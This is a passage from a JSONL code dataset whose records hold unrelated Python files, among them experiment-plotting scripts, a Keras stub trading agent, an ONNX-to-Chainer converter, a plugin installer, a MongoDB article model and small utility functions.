\"\\\\decimal_trialsheet.csv\",\n \"col_beg\": [1, 2, 3],\n \"col_end\": [2, 3, 4]},\n }\n\nwith open(code_dir + '/task_info.pickle', 'w') as file_:\n pickle.dump(task_info, file_)\n\n## Pseudo-randomized order of tasks and legend for timepoints.\ntask_order = [[['AX', 'RISE', 'Kirby', 'Decimal'],\n ['AX', 'RISE', 'Decimal', 'Kirby'],\n ['AX', 'Kirby', 'RISE', 'Decimal'],\n ['AX', 'Kirby', 'Decimal', 'RISE'],\n ['AX', 'Decimal', 'RISE', 'Kirby'],\n ['AX', 'Decimal', 'Kirby', 'RISE'],\n ['RISE', 'AX', 'Kirby', 'Decimal'],\n ['RISE', 'AX', 'Decimal', 'Kirby'],\n ['RISE', 'Kirby', 'AX', 'Decimal'],\n ['RISE', 'Kirby', 'Decimal', 'AX'],\n ['RISE', 'Decimal', 'AX', 'Kirby'],\n ['RISE', 'Decimal', 'Kirby', 'AX'],\n ['Kirby', 'AX', 'RISE', 'Decimal'],\n ['Kirby', 'AX', 'Decimal', 'RISE'],\n ['Kirby', 'RISE', 'AX', 'Decimal'],\n ['Kirby', 'RISE', 'Decimal', 'AX'],\n ['Kirby', 'Decimal', 'AX', 'RISE'],\n ['Kirby', 'Decimal', 'RISE', 'AX'],\n ['Decimal', 'AX', 'RISE', 'Kirby'],\n ['Decimal', 'AX', 'Kirby', 'RISE'],\n ['Decimal', 'RISE', 'AX', 'Kirby'],\n ['Decimal', 'RISE', 'Kirby', 'AX'],\n ['Decimal', 'Kirby', 'AX', 'RISE'],\n ['Decimal', 'Kirby', 'RISE', 'AX']],\n [['RISE', 'AX', 'Kirby', 'Decimal'],\n ['RISE', 'AX', 'Decimal', 'Kirby'],\n ['RISE', 'Kirby', 'AX', 'Decimal'],\n ['RISE', 'Kirby', 'Decimal', 'AX'],\n ['RISE', 'Decimal', 'AX', 'Kirby'],\n ['RISE', 'Decimal', 'Kirby', 'AX'],\n ['Kirby', 'AX', 'RISE', 'Decimal'],\n ['Kirby', 'AX', 'Decimal', 'RISE'],\n ['Kirby', 'RISE', 'AX', 'Decimal'],\n ['Kirby', 'RISE', 'Decimal', 'AX'],\n ['Kirby', 'Decimal', 'AX', 'RISE'],\n ['Kirby', 'Decimal', 'RISE', 'AX'],\n ['Decimal', 'AX', 'RISE', 'Kirby'],\n ['Decimal', 'AX', 'Kirby', 'RISE'],\n ['Decimal', 'RISE', 'AX', 'Kirby'],\n ['Decimal', 'RISE', 'Kirby', 'AX'],\n ['Decimal', 'Kirby', 'AX', 'RISE'],\n ['Decimal', 'Kirby', 'RISE', 'AX'],\n ['AX', 'RISE', 'Kirby', 'Decimal'],\n ['AX', 'RISE', 'Decimal', 'Kirby'],\n ['AX', 'Kirby', 'RISE', 'Decimal'],\n ['AX', 'Kirby', 'Decimal', 'RISE'],\n ['AX', 'Decimal', 'RISE', 'Kirby'],\n ['AX', 'Decimal', 'Kirby', 'RISE']],\n [['Kirby', 'AX', 'RISE', 'Decimal'],\n ['Kirby', 'AX', 'Decimal', 'RISE'],\n ['Kirby', 'RISE', 'AX', 'Decimal'],\n ['Kirby', 'RISE', 'Decimal', 'AX'],\n ['Kirby', 'Decimal', 'AX', 'RISE'],\n ['Kirby', 'Decimal', 'RISE', 'AX'],\n ['Decimal', 'AX', 'RISE', 'Kirby'],\n ['Decimal', 'AX', 'Kirby', 'RISE'],\n ['Decimal', 'RISE', 'AX', 'Kirby'],\n ['Decimal', 'RISE', 'Kirby', 'AX'],\n ['Decimal', 'Kirby', 'AX', 'RISE'],\n ['Decimal', 'Kirby', 'RISE', 'AX'],\n ['AX', 'RISE', 'Kirby', 'Decimal'],\n ['AX', 'RISE', 'Decimal', 'Kirby'],\n ['AX', 'Kirby', 'RISE', 
'Decimal'],\n ['AX', 'Kirby', 'Decimal', 'RISE'],\n ['AX', 'Decimal', 'RISE', 'Kirby'],\n ['AX', 'Decimal', 'Kirby', 'RISE'],\n ['RISE', 'AX', 'Kirby', 'Decimal'],\n ['RISE', 'AX', 'Decimal', 'Kirby'],\n ['RISE', 'Kirby', 'AX', 'Decimal'],\n ['RISE', 'Kirby', 'Decimal', 'AX'],\n ['RISE', 'Decimal', 'AX', 'Kirby'],\n ['RISE', 'Decimal', 'Kirby', 'AX']]]\n\ntp_dict = {\"1- 00 Month\": 0,\n \"3- 12 Month\": 1,\n \"4- 24 Month\": 2,\n }\n\ncol_beg = [1, 5, 9]\ncol_end = [5, 9, 13]\n\nwith open(code_dir + '/task_order.pickle', 'w') as file_:\n pickle.dump([task_order, tp_dict, col_beg, col_end], file_)\n","sub_path":"behav-gui/behav_order.py","file_name":"behav_order.py","file_ext":"py","file_size_in_byte":7348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"49672669","text":"import itertools\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import interp\nfrom sklearn.metrics import roc_curve, auc\n\npath_upwards = '../../'\nimport sys\nsys.path.extend([path_upwards + '../TailingDamDetection/'])\n\nimport config\nfrom utils.ml_functions import compute_confusion_matrix\nfrom utils.utils_input_output import read_label_dictionary\nfrom utils.utils_plots import plot_confusion_matrix_with_confidence\n\n\nexperiment_name = 'two_classes_cv_10_folds'\n\npath_to_data = path_upwards + config.data_path + config.experiment_data + experiment_name + '/'\npath_to_results = path_upwards + config.result_path + config.experiment_data + experiment_name + '/'\n\nn_runs = 10\nn_epoch = 40\nn_classes = 2\n\nlabel_dictionary = read_label_dictionary(path_to_data + \"label_dictionary.txt\")\nclass_codes = np.arange(n_classes)\nclass_labels = [label_dictionary[code] for code in class_codes]\n\nall_train_accuracy = np.zeros((n_runs, n_epoch), dtype=np.float64)\nall_test_accuracy = np.zeros((n_runs, n_epoch), dtype=np.float64)\nall_test_cm = np.zeros((n_runs, n_classes, n_classes), dtype=np.float64)\nall_test_auc = np.zeros((n_runs,), dtype=np.float64)\n\ntprs = []\nmean_fpr = np.linspace(0, 1, 100)\n\nfor run in range(n_runs):\n cur_results = np.load(path_to_results + 'results_{}_run.npz'.format(run))\n cur_data = np.load(path_to_data + 'train_test_data_{}.npz'.format(run))\n\n all_train_accuracy[run] = cur_results['train_accuracy']\n all_test_accuracy[run] = cur_results['test_accuracy']\n\n all_test_cm[run] = compute_confusion_matrix(np.argmax(cur_data['test_labels'], axis=1),\n np.argmax(cur_results['test_predicted_probs'], axis=1),\n normalise=True)\n\n # Compute ROC curve and area the curve\n fpr, tpr, thresholds = roc_curve(np.argmax(cur_data['test_labels'], axis=1),\n cur_results['test_predicted_probs'][:, 1])\n tprs.append(interp(mean_fpr, fpr, tpr))\n tprs[-1][0] = 0.0\n all_test_auc[run] = auc(fpr, tpr)\n\n\nmean_train_accuracy = np.mean(all_train_accuracy, axis=0)\nmean_test_accuracy = np.mean(all_test_accuracy, axis=0)\nmean_test_cm = np.mean(all_test_cm, axis=0)\nmean_test_auc = np.mean(all_test_auc)\n\nstd_train_accuracy = np.std(all_train_accuracy, axis=0)\nstd_test_accuracy = np.std(all_test_accuracy, axis=0)\nstd_test_cm = np.std(all_test_cm, axis=0)\nstd_test_auc = np.std(all_test_auc)\n\nx = np.arange(n_epoch)\n\nfig, ax = plt.subplots()\nplt.plot(x, mean_train_accuracy, 'r--', linewidth=2.0, label='train')\nax.fill_between(x,\n np.maximum(mean_train_accuracy - std_train_accuracy, np.zeros((n_epoch,), dtype=np.float64)),\n np.minimum(mean_train_accuracy + std_train_accuracy, np.ones((n_epoch,), dtype=np.float64)),\n 
facecolor='r', alpha=0.1)\n\nplt.plot(x, mean_test_accuracy, 'b-', linewidth=2.0, label='test')\nax.fill_between(x,\n np.maximum(mean_test_accuracy - std_test_accuracy, np.zeros((n_epoch,), dtype=np.float64)),\n np.minimum(mean_test_accuracy + std_test_accuracy, np.ones((n_epoch,), dtype=np.float64)),\n facecolor='b', alpha=0.2)\nplt.legend()\nplt.savefig(path_to_results + 'joint_accuracy_plots.pdf', format='pdf')\nplt.show()\n\n\nplot_confusion_matrix_with_confidence(mean_test_cm, std_test_cm,\n classes=class_labels, title='Confusion matrix on test')\nplt.savefig(path_to_results + 'joint_cm_plot.pdf', format='pdf')\nplt.show()\n\n# roc-curves\nmean_tpr = np.mean(tprs, axis=0)\nmean_tpr[-1] = 1.0\nmean_auc = auc(mean_fpr, mean_tpr)\nplt.plot(mean_fpr, mean_tpr, color='b',\n linewidth=2)\n\nstd_tpr = np.std(tprs, axis=0)\ntprs_upper = np.minimum(mean_tpr + std_tpr, 1)\ntprs_lower = np.maximum(mean_tpr - std_tpr, 0)\nplt.fill_between(mean_fpr, tprs_lower, tprs_upper, color='blue', alpha=.2)\nplt.title('ROC curve')\nplt.savefig(path_to_results + 'joint_roc_curve.pdf', format='pdf')\nplt.show()\n","sub_path":"dam_recognition/two_classes_cv_from_scratch/process_results.py","file_name":"process_results.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"433153243","text":"import random\nimport numpy as np\nfrom collections import deque\nfrom keras.layers import Dense, Input, Conv2D, Conv3D, Conv1D, MaxPool2D, MaxPool1D,\\\n concatenate, Flatten, Lambda, CuDNNLSTM, Reshape, Activation, Dropout, BatchNormalization\nfrom keras.optimizers import Adam, SGD\nfrom keras.regularizers import l1, l2, l1_l2\nfrom keras.models import Sequential, Model\nfrom keras.backend import int_shape, expand_dims\nfrom monlan.agents.ResnetBuilder import *\n\n# DQN Agent for the Cartpole\n# it uses Neural Network to approximate q function\n# and replay memory & target q network\nclass StubAgent:\n def __init__(self, state_size, action_size,\n discount_factor = 0.99,\n learning_rate = 0.001,\n epsilon = 1.0,\n epsilon_decay = 0.9999,\n epsilon_min = 0.01,\n batch_size = 64,\n train_start = 1500,\n memorySize = 2000):\n # if you want to see Cartpole learning, then change to True\n self.render = False\n self.load_model = False\n\n # get size of state and action\n self.state_size = state_size\n self.action_size = action_size\n\n # These are hyper parameters for the DQN\n self.discount_factor = discount_factor\n self.learning_rate = learning_rate\n self.epsilon = epsilon\n self.epsilon_decay = epsilon_decay\n self.epsilon_min = epsilon_min\n self.batch_size = batch_size\n self.train_start = train_start\n # create replay memory using deque\n self.memory = deque(maxlen=memorySize)\n self.memorySize = memorySize\n\n # create main model and target model\n self.model = self.build_model()\n #self.target_model = self.build_model()\n\n # initialize target model\n #self.update_target_model()\n\n # approximate Q function using Neural Network\n # state is input and Q Value of each action is output of network\n def build_model(self):\n\n model = None\n stateLen = len(self.state_size)\n if stateLen == 1:\n model = self.buildFlatModel()\n elif stateLen == 2:\n model = self.buildSimpleConvModel()\n elif stateLen == 3:\n model = self.buildHierarhicalConvModel()\n\n return model\n\n def buildFlatModel(self):\n model = Sequential()\n model.add(Dense(1, input_dim=self.state_size[0], activation='relu',\n kernel_initializer='glorot_uniform'))\n 
#model.summary()\n model.compile(loss='mse', optimizer=Adam(lr=self.learning_rate))\n return model\n\n def buildSimpleConvModel(self):\n mainInputShape = (self.state_size[0], self.state_size[1], 1)\n mainInput = Input(shape=mainInputShape)\n headModel = Conv2D(filters=1, kernel_size=2, strides=(1, 1), padding=\"same\", activation=\"relu\")(mainInput)\n headModel = Flatten()(headModel)\n bodyModel = Dense(self.action_size, activation=\"tanh\")(headModel)\n model = Model(inputs=mainInput, outputs=bodyModel)\n model.summary()\n model.compile(loss='mse', optimizer=Adam(lr=self.learning_rate))\n\n return model\n\n def buildHierarhicalConvModel(self):\n\n headModels = []\n mainInputShape = ( self.state_size[0], self.state_size[1], self.state_size[2], 1)\n mainInput = Input(shape=mainInputShape)\n #split = Lambda(lambda x: tf.split(x, num_or_size_splits=self.state_size[0], axis=1))(mainInput)\n #y = Lambda(lambda x: x[:, 0, :, :], output_shape=(1,) + mainInputShape[2:])(mainInput)\n for i in range( self.state_size[0] ):\n #y = Lambda(lambda x: x[:, 0, :, :], output_shape=(1,) + mainInputShape[2:])(mainInput)\n #headModelInput = Input( shape=(self.state_size[1], self.state_size[2], 1) )(split[i])\n #headModel = Conv2D(filters=64, kernel_size=4, padding=\"same\", activation=\"relu\")(split[i])\n headModelInput = Lambda(lambda x: x[:, i, :, :], mainInputShape[1:])(mainInput)\n #headModelInput = Input(shape=(self.state_size[1], self.state_size[2], 1))(headModelInput)\n #headModelInput._keras_shape = (None, headModelInput.keras_shape[2], headModelInput.keras_shape[3], headModelInput.keras_shape[4] )\n headModel = Conv2D(filters=32, kernel_size=8, strides=(4, 4), padding=\"same\",\n activation=\"elu\")(headModelInput)\n #headModel = BatchNormalization()(headModel)\n #headModel = Dropout(0.05)(headModel)\n #headModel = MaxPool2D(pool_size=(2, 2), padding=\"same\")(headModel)\n headModel = Conv2D( filters=64, kernel_size=4, strides=(2, 2), padding=\"same\",\n activation=\"elu\")(headModel)\n #headModel = BatchNormalization()(headModel)\n #headModel = Dropout(0.2)(headModel)\n #headModel = MaxPool2D(pool_size=(2, 2), padding=\"same\")(headModel)\n headModel = Conv2D(filters=64, kernel_size=3, strides=(1, 1), padding=\"same\",\n activation=\"elu\")(headModel)\n #headModel = BatchNormalization()(headModel)\n #headModel = Dropout(0.2)(headModel)\n # headModel = MaxPool2D(pool_size=(2, 2), padding=\"same\")(headModel)\n ###############################\n \"\"\"headModel = Reshape((headModel._keras_shape[1] * headModel._keras_shape[2], headModel._keras_shape[3]))(headModel)\n headModel._keras_shape = (None, headModel._keras_shape[1], headModel._keras_shape[2])\n # bodyModel = Activation(activation=\"linear\")(bodyModel)\n headModel = CuDNNLSTM(128)(headModel)\n headModel = Reshape((1, headModel._keras_shape[1]))(headModel)\"\"\"\n ###############################\n #headModel = Model(inputs=headModelInput, outputs=headModel)\n headModel = Reshape((1,int_shape(headModel)[1],\n int_shape(headModel)[2],\n int_shape(headModel)[3]))(headModel)\n #print(headModel.shape)\n headModels.append(headModel)\n\n #try to change axis of concatenation\n mergedHead = concatenate( [head for head in headModels], axis=1 )\n #print(mergedHead.shape)\n #######\n #mergedHead = Reshape((1, mergedHead._keras_shape[1], mergedHead._keras_shape[2]))(mergedHead)\n #######\n #mergedHead = expand_dims(mergedHead, axis=-1)\n featLen = int_shape(mergedHead)[1]\n rowLen = int_shape(mergedHead)[2] * int_shape(mergedHead)[3]\n w2vLen = 
int_shape(mergedHead)[4]\n #filterLen = int_shape(mergedHead)[3]\n #mergedHead._keras_shape = (None, mergedHead.shape[1].value, int_shape(mergedHead)[2], int_shape(mergedHead)[3])\n mergedHead = Reshape((featLen,\n rowLen,\n w2vLen, 1))(mergedHead)\n #######\n\n #try conv3d at top of head features\n # try conv1d at low levels\n #print(mergedHead.shape)\n featTypes = self.state_size[0]\n bodyModel = Conv3D(filters=32, kernel_size=8, strides=(1, 4, 4), padding=\"same\",\n activation=\"elu\")(mergedHead)\n #bodyModel = BatchNormalization()(bodyModel)\n #bodyModel = Dropout(0.05)(bodyModel)\n #bodyModel = MaxPool2D(pool_size=(2, 2), padding=\"same\")(bodyModel)\n bodyModel = Conv3D(filters=64, kernel_size=4, strides=(1, 2, 2), padding=\"same\",\n activation=\"elu\")(bodyModel)\n #bodyModel = BatchNormalization()(bodyModel)\n #bodyModel = Dropout(0.2)(bodyModel)\n #bodyModel = MaxPool2D(pool_size=(2, 2), padding=\"same\")(bodyModel)\n bodyModel = Conv3D(filters=64, kernel_size=3, strides=(1, 1, 1), padding=\"same\",\n activation=\"elu\")(bodyModel)\n #bodyModel = BatchNormalization()(bodyModel)\n #bodyModel = Dropout(0.2)(bodyModel)\n #bodyModel = MaxPool2D(pool_size=(2, 2), padding=\"same\")(bodyModel)\n\n #####################################################\n #bodyModel = Reshape((bodyModel.shape[1] * bodyModel.shape[2], bodyModel.shape[3] * bodyModel.shape[4]))(bodyModel)\n #bodyModel._keras_shape = (None, bodyModel._keras_shape[1].value, bodyModel._keras_shape[2].value)\n #bodyModel = CuDNNLSTM(512, return_sequences=False)(bodyModel)\n ####################################################\n #bodyModel = CuDNNLSTM( 512, return_sequences=True )(bodyModel)\n #bodyModel = SeqSelfAttention()(bodyModel)\n ####################################################\n\n bodyModel = Flatten()(bodyModel)\n bodyModel = Dense( self.action_size, activation=\"linear\" )(bodyModel)\n model = Model(inputs=mainInput, outputs=bodyModel)\n model.summary()\n model.compile(loss='mse', optimizer=Adam(lr=self.learning_rate))\n return model\n\n def fit_agent(self, env, nEpisodes, plotScores, saveFreq=5):\n pass\n\n def use_agent(self, env):\n self.epsilon = 0\n done = False\n score = 0\n state = env.reset()\n #state = np.reshape(state, [1, self.state_size])\n while not done:\n # get action for the current state and go one step in environment\n action = self.get_action(state)\n next_state, reward, done, info = env.step(action)\n #next_state = np.reshape(next_state, [1, self.state_size])\n score += reward\n state = next_state\n if done:\n # every episode update the target model to be same with model\n print(\"{}: \".format(env.iStep) + str(env.deposit))\n print(\"score:\", score)\n pass\n\n def save_agent(self, path, name):\n #import joblib\n #with open(path + \"/\" + name + \".pkl\", mode=\"wb\") as agentFile:\n # joblib.dump(self, agentFile)\n\n #self.model.save( path + name + \"main_model\" )\n #self.target_model.save(path + name + \"sup_model\")\n self.model.save_weights( path + name + \"_main_model\" + \".h5\")\n #self.target_model.save_weights(path + name + \"_sup_model\" + \".h5\")\n\n tmp_1 = self.model\n #tmp_2 = self.target_model\n self.model = None\n #self.target_model = None\n import joblib\n with open(path + \"/\" + name + \".pkl\", mode=\"wb\") as agentFile:\n joblib.dump(self, agentFile)\n self.model = tmp_1\n #self.target_model = tmp_2\n\n pass\n\n def load_agent(self, path, name, dropSupportModel = False):\n import joblib\n loadedAgent = None\n with open(path + \"/\" + name + \".pkl\", mode=\"rb\") as 
agentFile:\n            loadedAgent = joblib.load(agentFile)\n\n        self.model = None\n        #self.target_model = None\n        loadedAgent.model = loadedAgent.build_model()\n        #if dropSupportModel == False:\n        #loadedAgent.target_model = loadedAgent.build_model()\n        #loadedAgent.update_target_model()\n\n        loadedAgent.model.load_weights(path + name + \"_main_model\" + \".h5\")\n        #if dropSupportModel == False:\n        #    loadedAgent.target_model.load_weights(path + name + \"_sup_model\" + \".h5\")\n\n        return loadedAgent\n        #pass\n\n    # after some time interval update the target model to be same with model\n    def update_target_model(self):\n        #self.target_model.set_weights(self.model.get_weights())\n        pass\n\n    # get action from model using epsilon-greedy policy\n    def get_action(self, state):\n        return 0\n\n    # save sample to the replay memory\n    def append_sample(self, state, action, reward, next_state, done):\n        pass\n\n    # pick samples randomly from replay memory (with batch_size)\n    def train_model(self):\n        pass","sub_path":"monlan/agents/StubAgent.py","file_name":"StubAgent.py","file_ext":"py","file_size_in_byte":11745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"359678915","text":"import onnx\nimport numpy as np\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\nfrom functools import reduce\nif chainer.cuda.available:\n    import cupy as cp\n\nimport onnx2chainer.util\nfrom onnx2chainer.util import which\nfrom onnx2chainer import functions\n\ndef onnxToChainer(o, gpu=None, printTensorStack=False):\n    graph = o.graph\n\n    params = {}\n    for i in graph.initializer:\n        dtype = onnx2chainer.util.elemTypeToNumpy(i.data_type)\n        if len(i.raw_data) > 0:\n            d = np.frombuffer(i.raw_data, dtype=dtype)\n\n        elif len(i.float_data) > 0:\n            d = np.array(i.float_data, dtype=dtype)\n\n        elif len(i.int64_data) > 0:\n            d = np.array(i.int64_data, dtype=dtype)\n\n        else:\n            assert False\n\n        params[i.name] = d.reshape(i.dims)\n\n    class DecodedChain(chainer.Chain):\n        def __init__(self, graph, params):\n            super(DecodedChain, self).__init__()\n            self.nodes = []\n            for i, op in enumerate(graph.node):\n                cop = onnxNodeToChainer(op, params)\n                if gpu is not None and hasattr(cop, \"to_gpu\"):\n                    cop.to_gpu()\n\n                self.nodes.append((cop, op.input, op.output))\n                with self.init_scope():\n                    setattr(self, \"node_{}\".format(i), cop)\n\n            self.paramNames = params.keys()\n\n            nodeInputNames = set(reduce(lambda a,b: a+b,\n                                        map(lambda x: list(x[1]), self.nodes)))\n            nodeOutputNames = set(reduce(lambda a,b: a+b,\n                                         map(lambda x: list(x[2]), self.nodes)))\n\n            self.modelInputNames = nodeInputNames - nodeOutputNames - set(self.paramNames)\n\n        def forward(self, arg):\n            tensors = {}\n\n            if isinstance(arg, dict):\n                for k,v in arg.items():\n                    tensors[k] = v\n\n            else:\n                assert len(self.modelInputNames) == 1\n                tensors[list(self.modelInputNames)[0]] = arg\n\n            for op, iNames, oNames in self.nodes:\n                inputs = list(map(lambda x: tensors[x],\n                                  filter(lambda y: not y in self.paramNames, iNames))) # Ignore params. 
from parse_*'s arguments\n\n                if isinstance(inputs, self.xp.ndarray):\n                    inputs = inputs[0]\n\n                if printTensorStack:\n                    print(op)\n                    for k in tensors.keys():\n                        print(\"{} {}\".format(k, tensors[k].shape if tensors[k] is not None else None))\n\n                    print(\"-- {} -> {} --\".format(iNames, oNames))\n\n                outputs = op(*inputs)\n                if isinstance(outputs, chainer.Variable):\n                    assert len(oNames) == 1\n                    outputs = [outputs]\n\n                for i, oName in enumerate(oNames):\n                    tensors[oName] = outputs[i]\n\n            return outputs\n\n    return DecodedChain(graph, params)\n\ndef onnxNodeToChainer(op, ginits):\n    opType = op.op_type\n\n    inits = []\n    for iName in op.input:\n        if iName in ginits.keys():\n            inits.append(ginits[iName])\n\n    converterName = \"parse_{}\".format(opType)\n    if not hasattr(functions, converterName):\n        print(onnx2chainer.util.printONNX2ChainerWarning(\"op_type \\\"{}\\\" is not supported.\".format(opType)))\n        exit()\n\n    return getattr(functions, converterName)(op, inits)\n","sub_path":"onnx2chainer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"293919075","text":"#coding:utf-8\n\"\"\"\nCreated on 15.10.13\n\n@author: kasimova\n\"\"\"\nfrom abc import ABCMeta, abstractmethod\nimport os\nimport shutil\n\nfrom helpers import method_check_arg\nfrom plugin import Plugin\nfrom exceptions import MPException\n\nclass Installer(object):\n    \"\"\"\n    Interface responsible for installing/uninstalling a plugin\n    and enabling/disabling it\n    \"\"\"\n    __metaclass__ = ABCMeta\n    # Names of the scripts to run when installing and uninstalling plugins\n    NAME_AFTER_INSTALL = 'install.py'\n    NAME_BEFORE_UNINSTALL = 'uninstall.py'\n\n    @abstractmethod\n    def install(self, pl):\n        \"\"\"\n        \"\"\"\n\n    @abstractmethod\n    def uninstall(self, pl):\n        \"\"\"\n        \"\"\"\n\n\nclass TestInstaller(Installer):\n    \"\"\"\n    Does nothing, for tests only\n    \"\"\"\n\n    @method_check_arg(Plugin)\n    def install(self, plugin_info):\n        pass\n\n\n    @method_check_arg(Plugin)\n    def uninstall(self, plugin_info):\n        pass\n\n\nclass SimpleInstaller(Installer):\n    \"\"\"\n    Simple installer that can only copy from one folder to another\n    \"\"\"\n\n    def __init__(self):\n        #Folder where all plugins will be installed\n        self.install_dir = None\n\n    @property\n    def install_dir(self):\n        return self._install_dir\n\n    @install_dir.setter\n    def install_dir(self, value):\n        self._install_dir = value\n\n    def _has_script(self, target, name):\n        \"\"\"\n        @param target: folder to look in for a file called name, absolute path\n        @return: boolean whether the file exists in the folder\n        \"\"\"\n        for f in os.listdir(target):\n            if f == name:\n                return True\n        return False\n\n    @method_check_arg(Plugin)\n    def install(self, plugin_info):\n        try:\n            target = os.path.join(self.install_dir,\n                                  os.path.basename(plugin_info.path))\n\n            shutil.copytree(plugin_info.path, target)\n        except:\n            raise MPException(\"Could not install plugin: %s.\" %\n                              plugin_info.get_name())\n        if self._has_script(target, self.NAME_AFTER_INSTALL):\n            execfile(os.path.join(target, self.NAME_AFTER_INSTALL))\n\n\n    @method_check_arg(Plugin)\n    def uninstall(self, plugin_info):\n        target = os.path.join(self.install_dir,\n                              os.path.basename(plugin_info.path))\n        if self._has_script(target, self.NAME_BEFORE_UNINSTALL):\n            execfile(os.path.join(target, self.NAME_BEFORE_UNINSTALL))\n        try:\n            shutil.rmtree(os.path.join(self.install_dir,\n                                       os.path.basename(plugin_info.path)))\n        except OSError:\n            raise MPException(\n                \"Could not uninstall 
plugin: %s.\" % plugin_info.get_name())\n\n\n","sub_path":"masterpl/installer.py","file_name":"installer.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"591759545","text":"class Article(object):\n def __init__(self, mongo):\n self.mongo = mongo\n\n self.title = ''\n self.author = ''\n self.date = ''\n self.content = ''\n self.plaintext = ''\n\n def dict_fields(self):\n return dict({'title': self.title, 'author': self.author,\n 'date': self.date, 'content': self.content,\n 'plaintext': self.plaintext})\n\n def add_to_article_collection(self, title, author, date='', content='', plaintext=''):\n self.title = title\n self.author = author\n self.date = date\n self.content = content\n self.plaintext = plaintext\n\n article_collection = self.mongo.db.articles\n # article_collection.createIndex({'title': self.title}, {'unique': True})\n article_collection.insert(self.dict_fields())\n return 1\n\n def get_articles(self, page=0, size=10):\n print(\"article.py.get_articles: page \", page, \" size \", size)\n cursor = self.mongo.db.articles.find().skip(page * size).limit(size)\n print(\"get_articles: \", cursor)\n articles_arr = []\n for article in cursor:\n articles_arr.append(article)\n return articles_arr\n\n def get_article_by_id(self, article_id):\n cursor = self.mongo.db.articles.find({'_id': article_id})\n result = None\n for article in cursor:\n result = article\n # remove _id: ObjectId()\n del result['_id']\n return result\n","sub_path":"artistnest/_models/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"384373353","text":"#!/usr/bin/python3\n\n\n\"\"\"\nprints text with 2 newlines after a period, colon, and question mark\n\"\"\"\n\n\ndef text_indentation(text):\n \"\"\" prints a newline whenever a . ? 
and : is seen\n\n    Args:\n        text (str): input string\n\n    Returns:\n        void: prints to stdout\n\n    \"\"\"\n\n    if not isinstance(text, str):\n        raise TypeError('text must be a string')\n\n    i = 0\n    while i < len(text):\n        if text[i] in '.?:' and i != len(text) - 1 and text[i + 1] in ' ':\n            print(\"{}\\n\".format(text[i]))\n            for j in range(i + 1, len(text)):\n                if text[j] == ' ':\n                    i += 1\n                else:\n                    i += 1\n                    break\n            # loop exits at last whitespace character\n            # increment i to go beyond it\n            if text[i] == ' ':\n                i += 1\n        elif text[i] in '.?:':\n            print(\"{}\\n\".format(text[i]))\n            i += 1\n        else:\n            print(text[i], end='')\n            i += 1\n","sub_path":"0x07-python-test_driven_development/5-text_indentation.py","file_name":"5-text_indentation.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"521134625","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: zlikun\nimport json\n\n\ndef headers(ext_headers={}):\n    \"\"\"\n    Request message headers\n\n    :param ext_headers:\n    :return:\n    \"\"\"\n    data = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n                      \"Chrome/63.0.3239.132 Safari/537.36\",\n        \"Connection\": \"keep-alive\",\n    }\n    data.update(ext_headers)\n    return data\n\n\ndef get_first_item(lst):\n    \"\"\"\n    Get the first element from a list; return None if the list is empty\n\n    :param lst:\n    :return:\n    \"\"\"\n    if lst:\n        return lst[0]\n    else:\n        return None\n\n\ndef convert_id_string(data):\n    \"\"\"\n    Convert the _id field of a dict to a string (for ObjectId values)\n\n    :param data:\n    :return:\n    \"\"\"\n    if data and \"_id\" in data:\n        data[\"_id\"] = str(data[\"_id\"])\n    return data\n\n\nif __name__ == '__main__':\n    print(json.dumps(headers({\"User-Agent\": \"requests/2.19.1\"}), indent=4))\n    print(json.dumps(headers({\"Host\": \"www.biquge5200.cc\", \"Referer\": \"www.biquge5200.cc\"}), indent=4))\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"263108417","text":"import logging\nimport os\nimport time\nfrom datetime import datetime\nfrom enum import Enum\nfrom types import SimpleNamespace\n\nfrom biothings.utils.common import timesofar\n\n\ndef merge(x, dx):\n    \"\"\"\n    Merge dictionary dx (Δx) into dictionary x.\n    If __REPLACE__ key is present in any level z in dx,\n    z in x is replaced, instead of merged, with z in dx.\n    \"\"\"\n    assert isinstance(x, dict)\n    assert isinstance(dx, dict)\n\n    if dx.pop(\"__REPLACE__\", None):\n        # merge dx with \"nothing\" just to\n        # make sure to remove any \"__REPLACE__\"\n        _y = {}\n        merge(_y, dx)\n        x.clear()\n        x.update(_y)\n        return\n\n    for k, v in dx.items():\n        if isinstance(v, dict):\n            if not isinstance(x.get(k), dict):\n                x[k] = {}\n            merge(x[k], v)\n        else:\n            x[k] = v\n\ndef test_merge_0():\n    x = {}\n    y = {}\n    merge(x, y)\n    print(x)\n\ndef test_merge_1():\n    x = {\n        \"index\": {\n            \"name1\": {\n                \"doc_type\": \"news\",\n                \"happy\": False\n            }\n        }\n    }\n    y = {\n        \"index\": {\n            \"name1\": {\n                \"happy\": True,\n                \"count\": 100\n            }\n        }\n    }\n    merge(x, y)\n    print(x)\n\ndef test_merge_2():\n    x = {\"a\": {\"b\": \"c\"}}\n    y = {\"a\": {\n        \"__REPLACE__\": True,\n        \"b'\": {\n            \"__REPLACE__\": False,\n            \"c\": \"d\"\n        }\n    }}\n    merge(x, y)\n    print(x)\n\ndef test_merge_3():\n    x = {\"a\": \"b\"}\n    y = {\"a\": {\"b\": \"c\"}}\n    merge(x, y)\n    print(x)\n\ndef 